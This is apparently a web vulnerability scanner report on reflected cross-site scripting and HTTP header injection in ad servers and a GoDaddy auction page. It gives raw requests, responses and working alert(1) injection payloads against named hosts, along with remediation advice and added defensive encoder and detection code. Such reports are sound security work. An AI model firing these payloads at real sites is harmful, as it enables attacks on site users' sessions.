Location: http://usfca.edu/bps/graduate/Concurrent_Degree_Programs/MSFA___MBA/?utm_source=google&utm_medium=cpc&utm_term=ca84c
a3b87022440&utm_campaign=GoogleContent_Graduate&client=ca-dp-godaddy2_xml
P3P: policyref="http://www.xg4ken.com/w3c/p3p.xml", CP="ADMa DEVa OUR IND DSP NON LAW"
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8
The value of the c request parameter is copied into the Set-Cookie response header. The payload 1fb20%0d%0a9ce365740 was submitted in the c parameter. This caused a response containing an injected HTTP header.
Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Remediation background
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (&lt; &gt; etc.).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
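As an added example for the two defensive layers above and for the script-context findings that follow (written for this page, not code from the ad server), the Python below pairs allow-list validation with two encoders: an HTML entity encoder covering the metacharacters listed, and a JavaScript string encoder for the case where data must be echoed inside a quoted script string. The zone names q1.mng_bang and news_fr are taken from the requests below; the ZONE_NAME pattern is an assumed shape for them, and render_zone_script is a stand-in for the vulnerable response, not the real one.

```python
import re

# Added example for this page; not code from the ad server.

# Entity map for the metacharacters named in the text; & is included because it
# must be encoded first or the other entities would be double-decoded.
HTML_ENTITIES = {"&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;", "=": "&#x3d;"}


def html_encode(value):
    """Layer 2 for an HTML body or attribute context."""
    return "".join(HTML_ENTITIES.get(ch, ch) for ch in value)


def js_string_encode(value):
    """Layer 2 for a quoted JavaScript string: escape everything except ASCII letters and digits."""
    out = []
    for ch in value:
        if ch.isascii() and ch.isalnum():
            out.append(ch)
        elif ord(ch) < 0x100:
            out.append("\\x%02x" % ord(ch))
        else:
            out.append("\\u%04x" % ord(ch))
    return "".join(out)


# Layer 1: allow-list patterns of the kind the text describes.
PERSONAL_NAME = re.compile(r"[A-Za-z][A-Za-z .'-]{0,63}")
YEAR_OF_BIRTH = re.compile(r"[0-9]{4}")
ZONE_NAME = re.compile(r"[A-Za-z0-9_.]{1,32}")   # assumed shape of the ad zone names seen below


def validate(value, pattern):
    """Reject, do not sanitise: the caller gets a yes/no answer only."""
    return pattern.fullmatch(value) is not None


def render_zone_script(zone, encoder=None):
    """Echo the zone into a JS string literal, as the vulnerable responses below do."""
    value = zone if encoder is None else encoder(zone)
    return "var zone = '" + value + "';"


def unescaped_single_quotes(script):
    """Count single quotes not preceded by a backslash: an intact literal has exactly two."""
    count, escaped = 0, False
    for ch in script:
        if escaped:
            escaped = False
        elif ch == "\\":
            escaped = True
        elif ch == "'":
            count += 1
    return count


def string_literal_intact(script):
    return unescaped_single_quotes(script) == 2


if __name__ == "__main__":
    payload = "q1.mng_bang191d2'-alert(1)-'5261f476c6f"   # REST URL parameter 2 from the first finding
    print(validate(payload, ZONE_NAME))                       # False: rejected at layer 1
    print(render_zone_script(payload))                        # four quotes: the literal is broken open
    print(render_zone_script(payload, js_string_encode))      # two quotes: the payload stays data
```

Both encoders keep the surrounding literal intact against the report's payload, but only js_string_encode yields a value that JavaScript reads back unchanged; html_encode in a script block leaves the entity text inside the string, which is one reason the remediation detail below says to avoid echoing user data in a script context at all.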
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 191d2'-alert(1)-'5261f476c6f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/q1.mng_bang191d2'-alert(1)-'5261f476c6f/news_fr HTTP/1.1
Host: a.collective-media.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dc=dal; bkdp=1; blue=1; cli=11c4bc59fd87e17; JY57=3LjyTUOLJDCESzPtVdU9eUE0yOWzsN33CiJtgRMLbrpLE-GaRmaKZGw; nadp=1; qcdp=1;
Response
HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://www.collective.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 421
Date: Sun, 14 Nov 2010 23:04:20 GMT
Connection: close
Set-Cookie: dc=dal; domain=collective-media.net; path=/; expires=Tue, 14-Dec-2010 23:04:20 GMT
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d81a3'-alert(1)-'13182692657 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/q1.mng_bang/news_frd81a3'-alert(1)-'13182692657 HTTP/1.1
Host: a.collective-media.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dc=dal; bkdp=1; blue=1; cli=11c4bc59fd87e17; JY57=3LjyTUOLJDCESzPtVdU9eUE0yOWzsN33CiJtgRMLbrpLE-GaRmaKZGw; nadp=1; qcdp=1;
Response
HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://www.collective.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 421
Date: Sun, 14 Nov 2010 23:04:21 GMT
Connection: close
Set-Cookie: dc=dal; domain=collective-media.net; path=/; expires=Tue, 14-Dec-2010 23:04:21 GMT
3.3. http://a.collective-media.net/adj/q1.mng_bang/news_fr [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://a.collective-media.net
Path: /adj/q1.mng_bang/news_fr
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f0643'-alert(1)-'6bd51d1d378 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://www.collective.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 457
Date: Sun, 14 Nov 2010 23:03:13 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dal; domain=collective-media.net; path=/; expires=Tue, 14-Dec-2010 23:03:13 GMT
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d8f00'-alert(1)-'fd033e733cd was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://www.collective.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 454
Date: Sun, 14 Nov 2010 23:03:08 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dal; domain=collective-media.net; path=/; expires=Tue, 14-Dec-2010 23:03:08 GMT
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 137a4'-alert(1)-'161cf7d1c7b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cmadj137a4'-alert(1)-'161cf7d1c7b/q1.mng_bang/news_fr;sz=728x90;net=q1;ord=1289775746.342466; HTTP/1.1
Host: a.collective-media.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dc=dal; bkdp=1; blue=1; cli=11c4bc59fd87e17; JY57=3LjyTUOLJDCESzPtVdU9eUE0yOWzsN33CiJtgRMLbrpLE-GaRmaKZGw; nadp=1; qcdp=1;
Response
HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://www.collective.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 7210
Date: Sun, 14 Nov 2010 23:04:31 GMT
Connection: close
function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this. ...[SNIP]... <scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-25684700_1289775871","http://ad.doubleclick.net/adj137a4'-alert(1)-'161cf7d1c7b/q1.mng_bang/news_fr;net=q1;u=,q1-25684700_1289775871,11c4bc59fd87e17,none,cm.pb8k-cm.cm_xpd6_rtg-q1.none_h;;cmw=nurl;sz=728x90;net=q1;contx=none;dc=d;btg=cm.pb8k;btg=cm.cm_xpd6_rtg;btg=q1.none_h;ord=1 ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9e53d'-alert(1)-'e6ce7147582 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cmadj/q1.mng_bang9e53d'-alert(1)-'e6ce7147582/news_fr HTTP/1.1
Host: a.collective-media.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dc=dal; bkdp=1; blue=1; cli=11c4bc59fd87e17; JY57=3LjyTUOLJDCESzPtVdU9eUE0yOWzsN33CiJtgRMLbrpLE-GaRmaKZGw; nadp=1; qcdp=1;
Response
HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://www.collective.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 7156
Date: Sun, 14 Nov 2010 23:04:23 GMT
Connection: close
function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this. ...[SNIP]... <scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-19828667_1289775863","http://ad.doubleclick.net//q1.mng_bang9e53d'-alert(1)-'e6ce7147582/news_fr;net=q1;u=,q1-19828667_1289775863,11c4bc59fd87e17,none,cm.pb8k-cm.cm_xpd6_rtg-q1.none_h;;contx=none;dc=d;btg=cm.pb8k;btg=cm.cm_xpd6_rtg;btg=q1.none_h?","0","0",false);</scr'+'ipt> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d80db'-alert(1)-'232fd6d5621 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cmadj/q1.mng_bang/news_frd80db'-alert(1)-'232fd6d5621 HTTP/1.1
Host: a.collective-media.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dc=dal; bkdp=1; blue=1; cli=11c4bc59fd87e17; JY57=3LjyTUOLJDCESzPtVdU9eUE0yOWzsN33CiJtgRMLbrpLE-GaRmaKZGw; nadp=1; qcdp=1;
Response
HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://www.collective.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 7156
Date: Sun, 14 Nov 2010 23:04:24 GMT
Connection: close
function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this. ...[SNIP]... <scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-36731208_1289775864","http://ad.doubleclick.net//q1.mng_bang/news_frd80db'-alert(1)-'232fd6d5621;net=q1;u=,q1-36731208_1289775864,11c4bc59fd87e17,none,cm.pb8k-cm.cm_xpd6_rtg-q1.none_h;;contx=none;dc=d;btg=cm.pb8k;btg=cm.cm_xpd6_rtg;btg=q1.none_h?","0","0",false);</scr'+'ipt> ...[SNIP]...
3.8. http://a.collective-media.net/cmadj/q1.mng_bang/news_fr [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://a.collective-media.net
Path: /cmadj/q1.mng_bang/news_fr
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 72e02'-alert(1)-'70775120aca was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cmadj/q1.mng_bang/news_fr?72e02'-alert(1)-'70775120aca=1 HTTP/1.1
Host: a.collective-media.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dc=dal; bkdp=1; blue=1; cli=11c4bc59fd87e17; JY57=3LjyTUOLJDCESzPtVdU9eUE0yOWzsN33CiJtgRMLbrpLE-GaRmaKZGw; nadp=1; qcdp=1;
Response
HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://www.collective.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 7159
Date: Sun, 14 Nov 2010 23:04:21 GMT
Connection: close
function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this. ...[SNIP]... <scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-66804179_1289775861","http://ad.doubleclick.net//q1.mng_bang/news_fr?72e02'-alert(1)-'70775120aca=1;net=q1;u=,q1-66804179_1289775861,11c4bc59fd87e17,none,cm.pb8k-cm.cm_xpd6_rtg-q1.none_h;;contx=none;dc=d;btg=cm.pb8k;btg=cm.cm_xpd6_rtg;btg=q1.none_h?","0","0",false);</scr'+'ipt> ...[SNIP]...
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c3d68'-alert(1)-'4a0e64c7f72 was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the fpid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6e026"><script>alert(1)</script>ad814dac87d was submitted in the fpid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the m request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 26281'-alert(1)-'0c55ba31e43 was submitted in the m parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
3.12. http://ads.specificmedia.com/serve/v=5 [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://ads.specificmedia.com
Path: /serve/v=5
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5bea1'-alert(1)-'dbc8ca0f6a1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the PID request parameter is copied into the HTML document as plain text between tags. The payload fafd7<img%20src%3da%20onerror%3dalert(1)>ce4f20f87e3 was submitted in the PID parameter. This input was echoed as fafd7<img src=a onerror=alert(1)>ce4f20f87e3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document. Note that the response below is served as text/plain;charset=UTF-8, so a browser that honours the declared type renders the echo as text rather than markup; exploitability depends on the content being interpreted as HTML (for example through content sniffing), although the unencoded reflection itself is confirmed.
HTTP/1.0 200 OK
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Pragma: no-cache
Cache-Control: no-cache
Content-Type: text/plain;charset=UTF-8
Date: Mon, 15 Nov 2010 00:43:02 GMT
X-Cache: MISS from feeds.theplatform.com
Via: 1.0 sea1squid02 (squid/3.0.STABLE23)
Connection: close
"The PID looks like it was cut-off (\"oUFmCcyEZuCA7UqChCElKJFTJxFcgO9Gfafd7<img src=a onerror=alert(1)>ce4f20f87e3\"). This PID is 76 character(s) long, when it should be 32 characters long."
The value of the query request parameter is copied into the HTML document as plain text between tags. The payload ff556<img%20src%3da%20onerror%3dalert(1)>4349ba1ee07 was submitted in the query parameter. This input was echoed as ff556<img src=a onerror=alert(1)>4349ba1ee07 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of the ci request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d78be"%3balert(1)//d2ac33e709a was submitted in the ci parameter. This input was echoed as d78be";alert(1)//d2ac33e709a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?ci=13117d78be"%3balert(1)//d2ac33e709a&isc=GPPT03A117&domain=sftimes.com HTTP/1.1
Host: auctions.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Connection: close
Date: Sun, 14 Nov 2010 23:08:37 GMT
Server: Microsoft-IIS/6.0
P3P: CP="IDC DSP COR LAW CUR ADM DEV TAI PSA PSD IVA IVD HIS OUR SAM PUB LEG UNI COM NAV STA"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: isc=GPPT03A117; domain=.godaddy.com; path=/
Set-Cookie: ASP.NET_SessionId=vwx4pw45xf1n4zywv0gdvx45; path=/; HttpOnly
Set-Cookie: traffic=cookies=1&referrer=&sitename=auctions.godaddy.com&page=/trpHome.aspx&server=DNAWEB03&status=200 OK&querystring=ci=13117d78be%22%3balert(1)%2f%2fd2ac33e709a&isc=GPPT03A117&domain=sftimes.com&shopper=&privatelabelid=1&isc=GPPT03A117&clientip=174.122.23.218&referringpath=; domain=godaddy.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 210262
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head id="ctl00_Head1"><tit ...[SNIP]... <script type="text/javascript"> function AddMembershipToCart() { setCookie("IDPLoginRedirect", "https://auctions.godaddy.com/trpHome.aspx?ci=13117d78be";alert(1)//d2ac33e709a&isc=GPPT03A117&domain=sftimes.com"); if (getObj("ctl00_cphMaster_tbBidAmount")) { setCookie("IDPBid", getObj("ctl00_cphMaster_tbBidAmount").value); } else if (getObj("ctl00_cphMaster ...[SNIP]...
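The "echoed unmodified" and "echoed as ..." statements throughout this report come from comparing the probe the scanner sent with what the response contains between the random prefix and suffix. As an added example that is not the scanner's code and not part of the original report, the JavaScript below implements that check together with a coarse classification of the reflection context. The sample bodies are constructed, abridged versions of the response snippets shown in this report; the document.write wrapper around the ad-server snippet, the hex-escaped "fixed" variant and the entity-encoded text sample are assumptions made for illustration.

```javascript
// Added example, not the scanner's code: the check behind "echoed unmodified" and
// "echoed as ...". A probe is randomPrefix + core + randomSuffix, where core holds the
// metacharacters needed to break out of the suspected context; prefix and suffix let
// us find the echo in the response and see exactly what the server did to the core.

const JS_CONTENT_TYPES = /^(application\/(x-)?javascript|text\/javascript)\b/i;

function rand5() { return Math.random().toString(16).slice(2, 7); }

// core is the raw string the server should receive; urlForm is what goes on the wire
function makeProbe(core, prefix = rand5(), suffix = rand5()) {
  return { prefix, core, suffix, urlForm: prefix + encodeURIComponent(core) + suffix };
}

// Is position `pos` of an HTML body inside an open <script> element? Coarse: a plain
// text search, so it cannot see tags assembled at runtime such as '<scr'+'ipt'.
function inScriptBlock(body, pos) {
  const before = body.slice(0, pos).toLowerCase();
  return before.lastIndexOf("<script") > before.lastIndexOf("</script");
}

function contextOf(body, pos, contentType) {
  if (JS_CONTENT_TYPES.test(contentType)) return "script-resource"; // whole body is script
  return inScriptBlock(body, pos) ? "script-block" : "markup";
}

// One record per echo of the probe in body.
function checkReflection(body, probe, contentType = "text/html") {
  const sent = probe.core;
  const metachars = [...new Set(sent.replace(/[A-Za-z0-9]/g, ""))];
  const hits = [];
  let at = body.indexOf(probe.prefix);
  while (at >= 0) {
    const end = body.indexOf(probe.suffix, at + probe.prefix.length);
    if (end < 0) break;
    const echoed = body.slice(at + probe.prefix.length, end);
    hits.push({
      offset: at,
      echoed,
      unmodified: echoed === sent,
      // metacharacters that came back verbatim; an empty list means the context held
      survived: metachars.filter(c => echoed.includes(c)),
      context: contextOf(body, at, contentType),
    });
    at = body.indexOf(probe.prefix, end + probe.suffix.length);
  }
  return hits;
}

// Constructed sample bodies, abridged from snippets in this report.
const SAMPLE_GODADDY = '<html><head><script type="text/javascript"> function AddMembershipToCart() { setCookie("IDPLoginRedirect", "https://auctions.godaddy.com/trpHome.aspx?ci=13117d78be";alert(1)//d2ac33e709a&isc=GPPT03A117"); }</script></head></html>';
// hypothetical fixed variant: the core hex-escaped for a JS string literal
const SAMPLE_GODADDY_FIXED = SAMPLE_GODADDY.replace('";alert(1)//', '\\x22\\x3balert\\x281\\x29\\x2f\\x2f');
// ad-server response (application/x-javascript); the document.write wrapper is assumed
const SAMPLE_COLLECTIVE = `document.write('<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-25684700_1289775871","http://ad.doubleclick.net/adj137a4'-alert(1)-'161cf7d1c7b/q1.mng_bang/news_fr;sz=728x90","0","0",false);</scr'+'ipt>');`;
// hypothetical entity-encoded echo between tags
const SAMPLE_TEXT = "<p>0 search results for '4d577&lt;script&gt;alert(1)&lt;/script&gt;4e5c6690b88'</p>";

// Usage: summarise each hit in the report's own wording.
function describe(body, probe, contentType) {
  return checkReflection(body, probe, contentType).map(h =>
    `${h.context}: ${h.unmodified ? "echoed unmodified" : "echoed as " + h.echoed} (survived: ${h.survived.join("") || "none"})`);
}
```

The content-type check matters for the ad-server issues: their responses are whole JavaScript files, so a tag search finds no script element at all, and the `'<scr'+'ipt'` construction in those bodies would defeat it anyway. For HTML pages the text search is only a hint; a scanner has to parse the surrounding JavaScript (or simply observe which metacharacters are needed to break out) before it can claim a script context with certainty, which is what the `survived` list is for.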
The value of the ci request parameter is copied into a JavaScript rest-of-line comment. The payload 6c4df%0aalert(1)//42f0cddfa42 was submitted in the ci parameter. This input was echoed as 6c4df alert(1)//42f0cddfa42 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?ci=131176c4df%0aalert(1)//42f0cddfa42&isc=GPPT03A117&domain=sftimes.com HTTP/1.1
Host: auctions.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Connection: close
Date: Sun, 14 Nov 2010 23:08:39 GMT
Server: Microsoft-IIS/6.0
P3P: CP="IDC DSP COR LAW CUR ADM DEV TAI PSA PSD IVA IVD HIS OUR SAM PUB LEG UNI COM NAV STA"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: isc=GPPT03A117; domain=.godaddy.com; path=/
Set-Cookie: ASP.NET_SessionId=wrqsrz452daet5ecdizpbbnt; path=/; HttpOnly
Set-Cookie: traffic=cookies=1&referrer=&sitename=auctions.godaddy.com&page=/trpHome.aspx&server=DNAWEB03&status=200 OK&querystring=ci=131176c4df%0aalert(1)%2f%2f42f0cddfa42&isc=GPPT03A117&domain=sftimes.com&shopper=&privatelabelid=1&isc=GPPT03A117&clientip=174.122.23.218&referringpath=; domain=godaddy.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 209523
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the ci request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 17699"style%3d"x%3aexpression(alert(1))"651a2b61a83 was submitted in the ci parameter. This input was echoed as 17699"style="x:expression(alert(1))"651a2b61a83 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /?ci=1311717699"style%3d"x%3aexpression(alert(1))"651a2b61a83&isc=GPPT03A117&domain=sftimes.com HTTP/1.1
Host: auctions.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Connection: close
Date: Sun, 14 Nov 2010 23:08:35 GMT
Server: Microsoft-IIS/6.0
P3P: CP="IDC DSP COR LAW CUR ADM DEV TAI PSA PSD IVA IVD HIS OUR SAM PUB LEG UNI COM NAV STA"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: isc=GPPT03A117; domain=.godaddy.com; path=/
Set-Cookie: ASP.NET_SessionId=1lznjf45ui030teszo4b4ijt; path=/; HttpOnly
